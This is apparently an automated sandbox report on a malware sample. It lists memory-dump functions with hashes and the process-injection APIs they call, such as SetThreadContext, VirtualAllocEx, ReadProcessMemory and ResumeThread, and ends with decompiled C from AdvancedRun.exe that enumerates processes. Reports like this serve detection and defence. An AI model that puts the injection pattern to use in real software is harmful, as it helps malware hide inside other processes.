                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                  • Opcode ID: 41e5f5ac43fa10702812e24b97cc39a09a8b02c2d5b0b1a7775bfc6ecc3b7a47
                                                                                                                                                                  • Instruction ID: b1117276919dd77dc1dbaf513178eb23c9667655415ce170094cc55df753dc68
                                                                                                                                                                  • Opcode Fuzzy Hash: 41e5f5ac43fa10702812e24b97cc39a09a8b02c2d5b0b1a7775bfc6ecc3b7a47
                                                                                                                                                                  • Instruction Fuzzy Hash: B62125719043599FCB10CFA9C8806EEBBB1FF48314F51842AE569A7240D7789955CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A60E11, Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00A60E96
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                                  • Opcode ID: c5eb4c6ce4fadf4ef716385a8567e66a6bf3eaeed9775026bd013f218166d8b5
                                                                                                                                                                  • Instruction ID: 6a8f98cf8b640439af98f9540e1cffa20d4ba34ec6cb40cf2abdee1ad8830c44
                                                                                                                                                                  • Opcode Fuzzy Hash: c5eb4c6ce4fadf4ef716385a8567e66a6bf3eaeed9775026bd013f218166d8b5
                                                                                                                                                                  • Instruction Fuzzy Hash: D72137719042598FCB10CFA9C4847EFBBF0AF88358F158429E459A7640DB789985CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008B3748, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B37D7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: 476e75cfa23a5f76faf9ab9611c16121a72dbb92f92e702b817c5919a59a1234
                                                                                                                                                                  • Instruction ID: 913601c0d3b1f6459b857301586364aa27d2246476fcfa4e25041779e81bf622
                                                                                                                                                                  • Opcode Fuzzy Hash: 476e75cfa23a5f76faf9ab9611c16121a72dbb92f92e702b817c5919a59a1234
                                                                                                                                                                  • Instruction Fuzzy Hash: CC21E3B59042599FDB10CFAAD884ADEBFF4FB48324F14801AE914A7350D778AA44CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A624B0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00A62530
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                  • Opcode ID: 0fdb2963cf695bf0fb6dacb62844602a680e6e16c7e489ab97c8c7d4b918f0d7
                                                                                                                                                                  • Instruction ID: d1f47447d29c76adcec1658304cefee580f2bacd3cbc4423d132d5eb176c732d
                                                                                                                                                                  • Opcode Fuzzy Hash: 0fdb2963cf695bf0fb6dacb62844602a680e6e16c7e489ab97c8c7d4b918f0d7
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C2114729007599FCB10CFAAC884BEEBBB5FF48314F51842AE519A7240D7789954DBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A60E18, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00A60E96
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                                  • Opcode ID: be390f5f0dc61bb8b55fb47d4bba530f4b5664131681f09d5a2284350dfe0d0d
                                                                                                                                                                  • Instruction ID: 858b248e345986a2d1d59bc9913e2d667bf4ea3ad076d086fb714ca9cec3e05d
                                                                                                                                                                  • Opcode Fuzzy Hash: be390f5f0dc61bb8b55fb47d4bba530f4b5664131681f09d5a2284350dfe0d0d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D2137719042598FCB10CFAAC484BEFBBF4AF48358F148429D559A7240DB789984CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A63E60, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 00A63EE6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KernelObjectSecurity
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3015937269-0
                                                                                                                                                                  • Opcode ID: 38eb8791c800aad83ff67701139533af348ca1f160f05850cd23acc7c1f773fb
                                                                                                                                                                  • Instruction ID: d52036197af039a5945a08ae73ceade383cdefce625b19a4a77c18205dcb2dd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 38eb8791c800aad83ff67701139533af348ca1f160f05850cd23acc7c1f773fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 83211A729042498FCB10CF9AC484BDEBBF4EF88314F158529E519A7740D778A945CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008B3750, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B37D7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: 26ce46e14f385e1ce6a2207bde59e47bb1a1f6c3817c6020d265c2e3bc732825
                                                                                                                                                                  • Instruction ID: d8f8831dd08a18336bdf767f31e4eea8864ce83fc81d7b8899f3b280cccc9329
                                                                                                                                                                  • Opcode Fuzzy Hash: 26ce46e14f385e1ce6a2207bde59e47bb1a1f6c3817c6020d265c2e3bc732825
                                                                                                                                                                  • Instruction Fuzzy Hash: 3921C4B59002599FDB10CF9AD884ADEBBF8FB48324F14841AE914B3310D778A954DFA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A61AF0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00A61B66
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: 90523ac68ddeb005794f85ad9c8056a566faf0b8114837366f2b78bb812ffb49
                                                                                                                                                                  • Instruction ID: 9daebc5c011d8680397ea1fa95a0075388013a4fb925904cb64323e8645d51c8
                                                                                                                                                                  • Opcode Fuzzy Hash: 90523ac68ddeb005794f85ad9c8056a566faf0b8114837366f2b78bb812ffb49
                                                                                                                                                                  • Instruction Fuzzy Hash: D21153729002498FCF10DFAAC844ADFBFF6AF88328F148419E529A7240D7799954CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A61AF8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00A61B66
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: 9e2f42a11334c70032227894a329d747ba41044c4e77012c5609972a6aff82d0
                                                                                                                                                                  • Instruction ID: 078f88da65355f7a13a98f96c765c90321a89253d1ad3a023af286e20503f618
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e2f42a11334c70032227894a329d747ba41044c4e77012c5609972a6aff82d0
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E1164729002498FCF10DFAAC844BDFBFF5AF88328F148419E525A7240D779A954CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BCCD2, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 008BCD42
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: b1d65594c0db5fdf4a9afdf53539334f02cee4a678855575cffb50dd171816b1
                                                                                                                                                                  • Instruction ID: 7c71ebe1d608db254b2c0dbc7549c9c42cd191c6422bcfd31a1e535160b9adc5
                                                                                                                                                                  • Opcode Fuzzy Hash: b1d65594c0db5fdf4a9afdf53539334f02cee4a678855575cffb50dd171816b1
                                                                                                                                                                  • Instruction Fuzzy Hash: B91103B69002498FDB10CF9AD884ADEBBF4FB88314F15842AE515A7600C378A545CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BCCD8, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 008BCD42
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: db4fa82ca9e1d5063cef54f85983a0f0a61d7f4049892b5ed27bfcf754e11bc6
                                                                                                                                                                  • Instruction ID: 4eb50fca82aab44cd6ca92283b3adb40949cbe54a6c06c51dc96d6f5fca5a6c7
                                                                                                                                                                  • Opcode Fuzzy Hash: db4fa82ca9e1d5063cef54f85983a0f0a61d7f4049892b5ed27bfcf754e11bc6
                                                                                                                                                                  • Instruction Fuzzy Hash: EC11E2B69002498FCB10CF9AD844ADEFBF4FB88324F15842AE515A7700C378A949CFA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A63018, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                  • Opcode ID: c18512a3c9815cdf37cfa6fbb1ca53909699d6621ccbb564047dd32029b2fd04
                                                                                                                                                                  • Instruction ID: 4cf15de2162a2cb409b0225828c8a32e5eaf2645b0439c8e7e23e685c556a874
                                                                                                                                                                  • Opcode Fuzzy Hash: c18512a3c9815cdf37cfa6fbb1ca53909699d6621ccbb564047dd32029b2fd04
                                                                                                                                                                  • Instruction Fuzzy Hash: DE1146B29043498BCF10CFAAD4447DEBBF4AB88328F158429D569B7340D7789949CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BB854, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,008BC883), ref: 008BCAB6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: 0d1bb1bcf24c8accb40ea0dedbdc66edbc48cb940d8fddc8c5d8d9567880764b
                                                                                                                                                                  • Instruction ID: efc757a65c473b71ada4835acc92eaca154e8ab6a3a68c7fe9260e7681c7bf24
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d1bb1bcf24c8accb40ea0dedbdc66edbc48cb940d8fddc8c5d8d9567880764b
                                                                                                                                                                  • Instruction Fuzzy Hash: C811EFB69006598BCB10CF9AC444ADEFBF4EB88324F15842AD519B7700D3B4A949CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00A63020, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.468532659.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                  • Opcode ID: 048fe0901b233a5c21190df55afa2b0e93fcfc3db6ccb3d72cb3b32e617a8f05
                                                                                                                                                                  • Instruction ID: 17914fb7d88e9324f4a0b9b7e5da3bb45ca64b3b19f5f7032b1fd98a2325c176
                                                                                                                                                                  • Opcode Fuzzy Hash: 048fe0901b233a5c21190df55afa2b0e93fcfc3db6ccb3d72cb3b32e617a8f05
                                                                                                                                                                  • Instruction Fuzzy Hash: F31125729043488BCF10DFAAC8447DFFBF4AF88328F158419D529A7640DB78A949CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0085D4C8, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.466372468.000000000085D000.00000040.00000001.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ab20ec5476afeb1631983179d1d38ccf0409658a64781088c9b425d5e2f1b608
                                                                                                                                                                  • Instruction ID: 297ed13087b338ac82a0f16edc9d9b71186712fae5e54e5f5e78b3ee94cad0c0
                                                                                                                                                                  • Opcode Fuzzy Hash: ab20ec5476afeb1631983179d1d38ccf0409658a64781088c9b425d5e2f1b608
                                                                                                                                                                  • Instruction Fuzzy Hash: F4214871504344DFCB21DF14C8C0B1ABF65FB88319F24C569ED058B206D336D849CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0086D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.466706226.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2cad0bd5dcf8c172cbcd302dbf77b959a8b38d28140407420e781f5441be139a
                                                                                                                                                                  • Instruction ID: 470ed19f5c0ca49f822f549a9fc7bc16b0969dbf4ae9639142dc2ea7416daf00
                                                                                                                                                                  • Opcode Fuzzy Hash: 2cad0bd5dcf8c172cbcd302dbf77b959a8b38d28140407420e781f5441be139a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5721F275B04744DFCB14DF14D8C0B26BB65FB88318F25C569E9098B246C73BD847CAA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0085D4C3, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.466372468.000000000085D000.00000040.00000001.sdmp, Offset: 0085D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2a9d003929d6dc02cb6594d9b18e81f81af5a06eac6336c657b4c9dac273578b
                                                                                                                                                                  • Instruction ID: 672e583623e2239d1f5c50ade1cf0d38ddc3cce7f5c7cf228ac6633e5c30302f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2a9d003929d6dc02cb6594d9b18e81f81af5a06eac6336c657b4c9dac273578b
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E11AF76504280CFCB12CF10D9C4B16BF62FB94325F24C6A9DC054B656D336D85ACBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0086D017, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.466706226.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 725603eaebc9f1d621427d3cb60e09fa8cbd8244e7a14264b829477f2138ecd5
                                                                                                                                                                  • Instruction ID: 0f3d813b2ed0e4049d261f9465bc80eec3c2a80151472b4913dbb70c98de07c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 725603eaebc9f1d621427d3cb60e09fa8cbd8244e7a14264b829477f2138ecd5
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C118E75A04784DFCB11CF14D5C4B15BB61FB84314F24C6A9D8498B656C33AD84ACF62
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 08370016, Relevance: 33.9, Strings: 14, Instructions: 16421COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.534990519.0000000008370000.00000040.00000001.sdmp, Offset: 08370000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Dclu\rs\C$clu\rs\C$mcDclu\rs\C$nmcDclu\rs\C$tocsZzFxsnha ati tinrtnceirrE$u\rs\C$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl$Zgl
                                                                                                                                                                  • API String ID: 0-2306765114
                                                                                                                                                                  • Opcode ID: 110c810aaece1cef094f5e18c0f86271155c2b605ec01b6c0c93517e676c4a23
                                                                                                                                                                  • Instruction ID: 0559e69490ea58da9c5b514b3ec17c28474b5bfcbaa2497282090ef19b6ee03f
                                                                                                                                                                  • Opcode Fuzzy Hash: 110c810aaece1cef094f5e18c0f86271155c2b605ec01b6c0c93517e676c4a23
                                                                                                                                                                  • Instruction Fuzzy Hash: 66946F70925214CFCB24DF04CA89998B7F2AF9134BF96D0DAD4185F222E772D9C8CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BD360, Relevance: .5, Instructions: 523COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1e442434d5e78f92e595118012618f9eb2f5db3ed78a288cd600c4cc228bef45
                                                                                                                                                                  • Instruction ID: 28f7befd5d292d13dc74cfbf338ee32feca68fea10fa1339871bf645e485a45c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e442434d5e78f92e595118012618f9eb2f5db3ed78a288cd600c4cc228bef45
                                                                                                                                                                  • Instruction Fuzzy Hash: A45236B1502F26DFD710CF18EC986997BA1FB44328B91430BD161AFAE1E3B4658ACF44
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 008BB71C, Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.467275679.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2da6d989328c673ffa32b2a59e94f9736c7698f78c1734e162fe62ad55197b36
                                                                                                                                                                  • Instruction ID: f85fdf1f96a5095e2669102419ca301742f041395dbd2b6cd3f5d8e496a95332
                                                                                                                                                                  • Opcode Fuzzy Hash: 2da6d989328c673ffa32b2a59e94f9736c7698f78c1734e162fe62ad55197b36
                                                                                                                                                                  • Instruction Fuzzy Hash: A0A15936E1021A8FCF15DFA9C8445DEBBB2FF89304B15816AE905FB321EB71A945CB40
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Analysis Process: AdvancedRun.exe PID: 5380 Parent PID: 5604 AdvancedRun.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                                                                  0x00409609
                                                                                                                                                                  0x0040960f
                                                                                                                                                                  0x00409619
                                                                                                                                                                  0x00409623
                                                                                                                                                                  0x0040962e
                                                                                                                                                                  0x00409633
                                                                                                                                                                  0x00409640
                                                                                                                                                                  0x0040964a
                                                                                                                                                                  0x00409782
                                                                                                                                                                  0x0040978c
                                                                                                                                                                  0x00409793
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040965a
                                                                                                                                                                  0x0040965f
                                                                                                                                                                  0x00409678
                                                                                                                                                                  0x0040967e
                                                                                                                                                                  0x00409681
                                                                                                                                                                  0x00409685
                                                                                                                                                                  0x00409688
                                                                                                                                                                  0x004096b2
                                                                                                                                                                  0x004096bf
                                                                                                                                                                  0x004096c6
                                                                                                                                                                  0x004096cb
                                                                                                                                                                  0x004096da
                                                                                                                                                                  0x004096e6
                                                                                                                                                                  0x0040973b
                                                                                                                                                                  0x00409747
                                                                                                                                                                  0x0040975f
                                                                                                                                                                  0x00409764
                                                                                                                                                                  0x0040976a
                                                                                                                                                                  0x00409770
                                                                                                                                                                  0x00409773
                                                                                                                                                                  0x0040977d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040977d
                                                                                                                                                                  0x004096ee
                                                                                                                                                                  0x004096f5
                                                                                                                                                                  0x004096fc
                                                                                                                                                                  0x00409704
                                                                                                                                                                  0x0040970c
                                                                                                                                                                  0x0040971c
                                                                                                                                                                  0x0040971c
                                                                                                                                                                  0x00409704
                                                                                                                                                                  0x00409721
                                                                                                                                                                  0x00409728
                                                                                                                                                                  0x00409739
                                                                                                                                                                  0x00409739
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409728
                                                                                                                                                                  0x00409693
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004096a5
                                                                                                                                                                  0x004096a9
                                                                                                                                                                  0x004096ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004096ac
                                                                                                                                                                  0x004097a6

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                  • memset.MSVCRT ref: 0040962E
                                                                                                                                                                  • Process32FirstW.KERNEL32 ref: 0040964A
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,0000022C,?,?,?,?,00000000), ref: 00409681
                                                                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                                                                  • memset.MSVCRT ref: 004096C6
